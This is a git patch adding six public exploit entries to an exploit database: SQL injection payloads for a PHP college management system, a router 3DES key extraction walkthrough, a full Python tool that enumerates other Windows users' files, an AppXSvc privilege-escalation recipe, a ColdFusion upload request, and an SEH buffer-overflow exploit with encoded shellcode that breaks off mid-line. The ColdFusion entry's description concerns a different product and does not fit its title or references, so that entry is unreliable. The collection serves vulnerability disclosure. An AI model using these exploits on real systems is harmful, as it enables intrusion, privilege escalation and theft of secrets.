From b6378fddcc1cb3f25c73ff1cf837a093f7d484f1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 17 Sep 2019 05:02:21 +0000 Subject: [PATCH] DB: 2019-09-17 6 changes to exploits/shellcodes Windows NTFS - Privileged File Access Enumeration AppXSvc - Privilege Escalation docPrint Pro 8.0 - SEH Buffer Overflow Inteno IOPSYS Gateway - Improper Access Restrictions Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection --- exploits/cfm/webapps/47392.txt | 64 ++++ exploits/hardware/remote/47390.txt | 96 ++++++ exploits/php/webapps/47395.txt | 27 ++ exploits/windows/local/47357.py | 458 +++++++++++++++++++++++++++++ exploits/windows/local/47389.txt | 53 ++++ exploits/windows/local/47394.py | 114 +++++++ files_exploits.csv | 6 + 7 files changed, 818 insertions(+) create mode 100644 exploits/cfm/webapps/47392.txt create mode 100644 exploits/hardware/remote/47390.txt create mode 100644 exploits/php/webapps/47395.txt create mode 100755 exploits/windows/local/47357.py create mode 100644 exploits/windows/local/47389.txt create mode 100755 exploits/windows/local/47394.py diff --git a/exploits/cfm/webapps/47392.txt b/exploits/cfm/webapps/47392.txt new file mode 100644 index 000000000..a09685700 --- /dev/null +++ b/exploits/cfm/webapps/47392.txt @@ -0,0 +1,64 @@ +===========Security Intelligence============ +# Vendor Homepage: adobe.com +# Version: 2018 +# Tested on: Adobe ColdFusion 2018 +# Exploit Author: Pankaj Kumar Thakur (Nepal) + +==========[Table of Contents]============== + * Overview + * Detailed description + * Thanks & Acknowledgements + * References + +==========[Vulnerability Information]======== + + * Unrestricted file upload in Adobe ColdFusion 2018 + * CWE-434 + * Base Score: 6.8 MEDIUM + * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H + +=========[ Overview]========================= + + * System Affected: Adobe ColdFusion 2018 + * Impact: Unrestricted file upload + +=====[ Detailed description]================= +Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. + +Request + +POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm +HTTP/1.1 +Host: hostname:portno +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Content-Type: multipart/form-data; +Content-Length: 303 +Connection: close +Upgrade-Insecure-Requests: 1 + +. +. + +-----------------------------24464570528145 +Content-Disposition: form-data; name="file"; filename="shell_file with extension" +Content-Type: image/jpeg + +shell code +-----------------------------24464570528145 +Content-Disposition: form-data; name="path" +. +. +After uploading shell, its located here + +http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension + +=====[ Thanks & Acknowledgements]======================================== +* Acknowledged by Adobe +* Duplicate + + + * https://nvd.nist.gov/vuln/detail/CVE-2016-10258 + * https://www.cvedetails.com/cve/CVE-2016-1713/ + * https://www.openwall.com/lists/oss-security/2016/01/12/4 + +=====[ EOF ]=========================================================== \ No newline at end of file diff --git a/exploits/hardware/remote/47390.txt b/exploits/hardware/remote/47390.txt new file mode 100644 index 000000000..fdb5cbdbf --- /dev/null +++ b/exploits/hardware/remote/47390.txt @@ -0,0 +1,96 @@ +# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions +# Date: 2019-06-29 +# Exploit Author: Gerard Fuguet (gerard@fuguet.cat) +# Vendor Homepage: https://www.intenogroup.com/ +# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650 +# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937 +# Affected Component: SIP password, Info Gathering of Network Config +# Attack Type: Remote +# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router +# CVE : CVE-2019-13140 + +# Description: +Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before +firmwares routers have a JUCI ACL misconfiguration that allows +the "user" account to extract the 3DES key via JSON commands to ubus. +The 3DES key is used to decrypt the provisioning file provided by +Adamo Telecom on a public URL via cleartext HTTP. + +# Attack Vectors: +To get success on the exploitation, two components are mandatory: 1. +the encrypted file (.enc) and 2. The 3DES key for decrypt it. The +encrypted file can be downloaded via HTTP URL offered by Adamo ISP +(works from any external network). Then is need to interact with the +router using WebSocket protocol to obtain the 3DES key, a web browser +like Firefox can be used as WebSocket client under the developer +tools. Session id is acquired with the same username and password of +the router (in this case, password is the same as wifi defaults). Once +3DES key is obtained through a JSON request command, .enc file can be +decrypted with the help of openssl tool. + +# PoC: +Step 1: Getting the provisioning file +Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc +Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without +the colons. You can also get your MAC by doing a ping to the router +and then an arp command on terminal. +Step 2: The 3DES Key +Let's communcatie by Sockets +- Using Firefox, open the router’s webpage (192.168.1.1 by default). +- Invoke the developer tools by pressing F12 and go to the Console Tab. +- Let’s create the WebSocket: +var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json") +- And creating the Log for show responses in each petition: +superSocket.onmessage = function (event) {console.log(event.data)} +- We request an ID session with the same login parameters that when access +to the router’s website. (put your wifis router password instead of +wifis-password value): +superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666})) +- Now, you will obtain a response, the value of the parameter that says +“ubus_rpc_session” refers to your session’s ID, copy it to use in the next +request call. +- Requesting information about the router’s System. (put your session ID +instead of put-your-session-id-here value): +superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999})) +- On the response obtained, copy the value of the “des” parameter. +It’s 16 digits that we need convert to hexadecimal. +Step 3: Ready for Decrypting +Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key: +echo -n XXXXXXXXXXXXXXXX | xxd -p +- Use openssl tool to decrypt your provisioning file. (Put your "des" key +instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX +refers the name of your encryption provisioning file, in the -out +value, the name can be different): +openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz +- Uncompress the decrypted file: +tar -xzvf XXXXXXXXXXXX.tar.gz +- You get the file: Provisioning.conf. +- Showing the file: +cat Provisioning.conf +- The end of the line refers to the secret, the password of your +SIP account. +A video was created to show all these Steps in action: +https://youtu.be/uObz1uE5P4s + +# Additional Information: +A packet sniffer like Wireshark can be used for retrieve the 3DES key +instead of using WebSocket communication protocol. In that case, user +needs to do the login on the router's page, and then the JSON request +containing the 3DES key will be catched. + +# References: +https://twitter.com/GerardFuguet/status/1169298861782896642 +https://www.slideshare.net/fuguet/call-your-key-to-phone-all + +# Timeline: +2019-06-29 - White Paper done +2019-07-01 - CVE assigned +2019-07-09 - Notified to Inteno +2019-07-11 - Adamo aware and ask for detailed info +2019-07-12 - Info facilitated +2019-07-25 - Early patch available and applied (Cooperation starts) +2019-07-26 - Tested and failed (VoIP not working) +2019-08-27 - New firmware available +2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router +2019-08-31 - Tested OK +2019-09-04 - Disclosure published \ No newline at end of file diff --git a/exploits/php/webapps/47395.txt b/exploits/php/webapps/47395.txt new file mode 100644 index 000000000..67df0cf23 --- /dev/null +++ b/exploits/php/webapps/47395.txt @@ -0,0 +1,27 @@ +# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection +# Author: Cakes +# Discovery Date: 2019-09-16 +# Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem +# Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip +# Tested Version: 1.3 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Description: +# Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-) + +# Parameter: batch (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause + +Payload: batch=-9643' OR 9247=9247-- aqgq + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe + +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns + +Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb \ No newline at end of file diff --git a/exploits/windows/local/47357.py b/exploits/windows/local/47357.py new file mode 100755 index 000000000..445aaa345 --- /dev/null +++ b/exploits/windows/local/47357.py @@ -0,0 +1,458 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows NTFS + +NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family. + + +[Vulnerability Type] +Privileged File Access Enumeration + + +[CVE Reference] +N/A + + +[Security Issue] +Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name. +This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension +or have a "." (dot) as part of the file or folder name. + +Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames +of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal +those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities. + +Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename +are always issued the expected "Access is denied" system error message. + +However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning: +"The system cannot find the file". + +This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file". + +Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not. +This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files +exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not. + +However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible +users file on the command line much like calling a program and pressing the enter key. + +After the Win32 API function CreateFile is called an it returns either: + +1) "The system cannot find the file" +2) "Access is denied" + +C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact +The system cannot find the file <==== DOES NOT EXIST + +C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact +Access is denied. <===== EXISTS + +C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con +The system cannot find the file <==== DOES NOT EXIST + +C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever +Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME + +From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe +or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. + +Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide +processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is +how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the +malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. + +Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. +However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. + +Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing +files or folders in the local file system. + + +Tested successfully Win7/10 + + +[Exploit/POC] +"NtFileSins.py" + +from subprocess import Popen, PIPE +import sys,argparse,re + +# NtFileSins v2.1 +# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. +# Fixed: save() logic to log report in case no Zone.Identifiers found. +# +# Windows File Enumeration Intel Gathering. +# Standard users can prove existence of privileged user artifacts. +# +# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, +# when a file exists or doesn't exist, when restricted access is attempted by another user. +# +# However, accessing files directly by attempting to "open" them from cmd.exe shell, +# we can determine existence by compare inconsistent Windows error messages. +# +# Requirements: 1) target users with >= privileges (not admin to admin). +# 2) artifacts must contain a dot "." or returns false positives. +# +# Windows message "Access Denied" = Exists +# Windows message "The system cannot find the file" = Not exists +# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, +# operable program or batch file" = Admin to Admin so this script is not required. +# +# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. +# For evil or maybe check for basic malware IOC existence on disk with user-only rights. +# +#======================================================================# +# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 # +# By John Page (aka hyp3rlinx) # +# Apparition Security # +#======================================================================# + +BANNER=''' + _ _______________ __ _____ _ + / | / /_ __/ ____(_) /__ / ___/(_)___ _____ + / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ + / /| / / / / __/ / / / __/__/ / / / / (__ ) +/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1 + By hyp3rlinx + ApparitionSec +''' + +sin_cnt=0 +internet_sin_cnt=0 +found_set=set() +zone_set=set() +ARTIFACTS_SET=set() +ROOTDIR = "c:/Users/" +ZONE_IDENTIFIER=":Zone.Identifier:$DATA" + +USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", + "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] + +APPDATA_DIR=["AppData/Local/Temp"] + +EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", + ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) + +REPORT="NtFileSins_Log.txt" + +def usage(): + print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" + print '-u victim -d Searches -a "MS17-020 - Google Search.url"' + print '-u victim -a ""' + print "-u victim -d Downloads -a -s" + print '-u victim -d Contacts -a "Mike N.contact"' + print "-u victim -a APT.txt -b -n" + print "-u victim -d -z Desktop/MyFiles -a <.name>" + print "-u victim -d Searches -a .search-ms" + print "-u victim -d . -a " + print "-u victim -d desktop -a inverted-crosses.mp3 -b" + print "-u victim -d Downloads -a APT.exe -b" + print "-u victim -f list_of_files.txt" + print "-u victim -f list_of_files.txt -b -s" + print "-u victim -f list_of_files.txt -x .txt" + print "-u victim -d desktop -f list_of_files.txt -b" + print "-u victim -d desktop -f list_of_files.txt -x .rar" + print "-u victim -z -s -f list_of_files.txt" + +def parse_args(): + parser.add_argument("-u", "--user", help="Privileged user target") + parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") + parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") + parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.") + parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.") + parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.") + parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.") + parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.") + parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.") + parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT) + parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.") + parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.") + return parser.parse_args() + + +def access(j): + result="" + try: + p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True) + stderr,stdout = p.communicate() + result = stdout.strip() + except Exception as e: + #print str(e) + pass + return result + + +def artifacts_from_file(artifacts_file, bflag, specific_ext): + try: + f=open(artifacts_file, "r") + for a in f: + idx = a.rfind(".") + a = a.strip() + if a != "": + if specific_ext: + if idx==-1: + a = a + specific_ext + else: + #replace existing ext + a = a[:idx] + specific_ext + if bflag: + ARTIFACTS_SET.add(a) + else: + ARTIFACTS_SET.add(a) + f.close() + except Exception as e: + print str(e) + exit() + + +def save(): + try: + f=open(REPORT, "w") + for j in found_set: + f.write(j+"\n") + f.close() + except Exception as e: + print str(e) + + +def recon_msg(s): + if s == 0: + return "Access is denied." + else: + return "\t[*] Artifact exists ==>" + + +def echo_results(args, res, x, i): + global sin_cnt + if res=="": + print "\t[!] No NTFS message, you must already be admin, then this script is not required." + exit() + if "not recognized as an internal or external command" in res: + print "\t[!] You must target users with higher privileges than yours." + exit() + if res != recon_msg(0): + if args.verbose: + print "\t"+res + else: + if args.notfound: + print "\t[-] not found: " + x +"/"+ i + else: + sin_cnt += 1 + if args.save or args.zone_identifier: + found_set.add(x+"/"+i) + if args.verbose: + print recon_msg(1)+ x+"/"+i + print "\t"+res + else: + print recon_msg(1)+ x+"/"+i + + +def valid_artifact_name(sin,args): + idx = "." in sin + if re.findall(r"[/\\*?:<>|]", sin): + print "\t[!] Skipping: disallowed file name character." + return False + if not idx and not args.built_in_ext and not args.specific_ext: + print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives." + print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives." + if not args.built_in_ext: + if sin[-1] == ".": + print "\t[!] Skipping: "+sin+" non valid file name." + return False + return True + + +def search_missing_ext(path,args,i): + for x in path: + for e in EXTS: + res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) + echo_results(args, res, x, i+e) + + +#Check if the found artifact was downloaded from internet +def zone_identifier_check(args): + + global ROOTDIR, internet_sin_cnt + zone_set.update(found_set) + + for c in found_set: + c = c + ZONE_IDENTIFIER + res = access(ROOTDIR+args.user+"/"+c) + if res == "Access is denied.": + internet_sin_cnt += 1 + print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!." + zone_set.add(c) + + +def ntsins(path,args,i): + if i.rfind(".")==-1: + search_missing_ext(path,args,i) + i="" + for x in path: + if i != "": + if args.built_in_ext: + for e in EXTS: + res = access(ROOTDIR+args.user+"/"+x+"/"+i+e) + echo_results(args, res, x, i+e) + elif args.specific_ext: + idx = i.rfind(".") + if idx == -1: + i = i + "." + else: + i = i[:idx] + args.specific_ext + res = access(ROOTDIR+args.user+"/"+x+"/"+i) + echo_results(args, res, x, i) + + +def search(args): + print "\tSearching...\n" + global ROOTDIR, USER_DIRS, ARTIFACTS_SET + + if args.artifact: + ARTIFACTS_SET = set([args.artifact]) + + for i in ARTIFACTS_SET: + idx = i.rfind(".") + 1 + if idx and args.built_in_ext: + i = i[:idx -1:None] + if len(i) > 0 and i != None: + if valid_artifact_name(i,args): + #specific user dir search + if args.directory: + single_dir=[args.directory] + ntsins(single_dir,args,i) + #search appdata dirs + elif args.appdata: + ntsins(APPDATA_DIR,args,i) + #all default user dirs + else: + ntsins(USER_DIRS,args,i) + + +def check_dir_input(_dir): + if len(re.findall(r":", _dir)) != 0: + print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h." + return False + return True + + +def main(args): + + if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + + if args.examples: + usage() + exit() + + if not args.user: + print "[!] No target user specified see Help -h" + exit() + + if args.appdata and args.directory: + print "[!] Multiple search directories supplied see Help -h" + exit() + + if args.specific_ext: + if "." not in args.specific_ext: + print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives." + exit() + + if args.artifact and args.artifacts_from_file: + print "[!] Multiple artifacts specified, use just -f or -a see Help -h" + exit() + + if args.built_in_ext and args.specific_ext: + print "\t[!] Both specific and built-in extensions supplied, use only one." + exit() + + if args.specific_ext and not args.artifacts_from_file: + print "\t[!] -x to be used with -f flag only see Help -h." + exit() + + if args.artifact: + if args.artifact.rfind(".")==-1: + print "\t[!] Artifacts must contain a .ext or will result in false positives." + exit() + + if args.directory: + if not check_dir_input(args.directory): + exit() + + if args.artifacts_from_file: + artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext) + + if not args.artifact and not args.artifacts_from_file: + print "[!] Exiting, no artifacts supplied see Help -h" + exit() + else: + search(args) + + if sin_cnt >= 1 and args.zone_identifier: + zone_identifier_check(args) + + if args.save and len(found_set) != 0 and not args.zone_identifier: + save() + + if args.save and len(zone_set) != 0: + found_set.update(zone_set) + save() + + print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n" + + if args.zone_identifier and internet_sin_cnt >= 1: + print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n" + + if not args.notfound: + print "\tuse -n to display unfound enumerated files." + if not args.built_in_ext: + print "\tfor extra search coverage try -b flag or targeted artifact search -a." + +if __name__ == "__main__": + print BANNER + parser = argparse.ArgumentParser() + main(parse_args()) + + + +[POC Video URL] +https://www.youtube.com/watch?v=rm8kEbewqpI + + + +[Network Access] +Remote/Local + + + +[Severity] +Low + + +[Disclosure Timeline] +Vendor Notification: July 29, 2019 +MSRC "does not meet the bar for security servicing" : July 29, 2019 +September 5, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47389.txt b/exploits/windows/local/47389.txt new file mode 100644 index 000000000..2ff08627a --- /dev/null +++ b/exploits/windows/local/47389.txt @@ -0,0 +1,53 @@ +#-----------------------------------------------------------------------------# +# Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) # +# Date: Sep 4 2019 # +# Exploit Author: Gabor Seljan # +# Vendor Homepage: https://www.microsoft.com/ # +# Version: 17763.1.amd64fre.rs5_release.180914-1434 # +# Tested on: Windows 10 Version 1809 for x64-based Systems # +# CVE: CVE-2019-1253 # +#-----------------------------------------------------------------------------# + +Summary: + +AppXSvc improperly handles file hard links resulting in a low privileged user +being able to take 'Full Control' of an arbitrary file leading to elevation of +privilege. + +Description: + +An elevation of privilege vulnerability exists when the AppX Deployment Server +(AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 +originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens +the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that +modifies the security descriptor of the files. Further analyzis revealed that +the restore operation can be triggered on demand by preventing AppXSvc from +accessing the settings.dat[.LOGx] files. This can be achieved by locking the +settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation' +errors when Edge and AppXSvc are trying to access it. Eventually the restore +operation kicks in and if the settings.dat[.LOGx] file has been replaced with +a hard link AppXSvc will overwrite the security descriptor of the target file. +A low privileged user can leverage this vulnerability to take 'Full Control' +of an arbitrary file. + +Steps to reproduce: +1. Terminate Edge. +2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini. +3. Open the hard link for reading and lock the file. +4. Start Edge and wait a few seconds for the restore operation to kick in. +5. Unlock the file and close the file handle. + +Expected result: +Full access (GENERIC_ALL) to C:\Windows\win.ini is denied. + +Observed result: +C:\Windows\win.ini has had it's security descriptor rewritten to grant +'Full Control' to the low privileged user. + +PoC files: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47389.zip + +References: +https://github.com/sgabe/CVE-2019-1253 +https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253 +https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841 \ No newline at end of file diff --git a/exploits/windows/local/47394.py b/exploits/windows/local/47394.py new file mode 100755 index 000000000..764409837 --- /dev/null +++ b/exploits/windows/local/47394.py @@ -0,0 +1,114 @@ +import struct +# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow +# Date: September 14th, 2019 +# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io) +# Vendor Homepage: http://www.verypdf.com +# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe +# Version: 8.0 +# Tested on: Windows 10 and Windows 7 + + +# TO RUN: +# 1. Create a blank file named "test.pdf" +# 2. Open doc2pdf_win.exe +# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File" +# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay" +# 5. Click "Add File(s)" +# 6. Select the "test.pdf" file created from step 1. +# 7. Press on "Start" and name the file "exploit.pdf" + +# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII) + +# Zero out registers for calculations. +zero = "\x25\x01\x01\x01\x01" +zero += "\x25\x10\x10\x10\x10" + +# Stack alignment +alignment = "\x54" # push esp +alignment += "\x58" # pop eax +alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555 +alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 +alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 +alignment += "\x50" # push eax +alignment += "\x5c" # pop esp + +# Custom created and encoded MessageBox POC shellcode. +# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function. +# \x31\xc0\x50\x68 +# \x42\x41\x4a\x41 +# \x89\xe1\x50\x68 +# \x42\x41\x4a\x41 +# \x89\xe2\x50\x50 +# \x51\x52\x50\xbe +# \x38\x20\x00\x10 +# \xff\xe6\x41\x41 + +# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!) +shellcode = zero # zero out eax +shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555 +shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255 +shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157 +shellcode += "\x50" # push eax + +# 4F554A42 4F554A42 51554B44 +shellcode += zero # zero out eax +shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 +shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 +shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44 +shellcode += "\x50" # push eax + +# 153A393A 153A393A 173B3B3B +shellcode += zero +shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b +shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a +shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b +shellcode += "\x50" # push eax + +# 3A3A1927 3A3A0227 3B3B0229 +shellcode += zero # zero out eax +shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927 +shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227 +shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229 +shellcode += "\x50" # push eax + +# 3F3C3F3F 3F3C3F3F 403D4040 +shellcode += zero # zero out eax +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 +shellcode += "\x50" # push eax + +# 323A1A27 323A0227 333B0229 +shellcode += zero # zero out eax +shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27 +shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227 +shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229 +shellcode += "\x50" # push eax + +# 3F3C3F3F 3F3C3F3F 403D4040 +shellcode += zero # zero out eax +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 +shellcode += "\x50" # push eax + +# 323A1545 323A1545 333B1545 +shellcode += zero # zero out eax +shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545 +shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545 +shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545 +shellcode += "\x50" # push eax + +# Let's roll. +payload = "\x41" * 1676 +payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes +payload += struct.pack('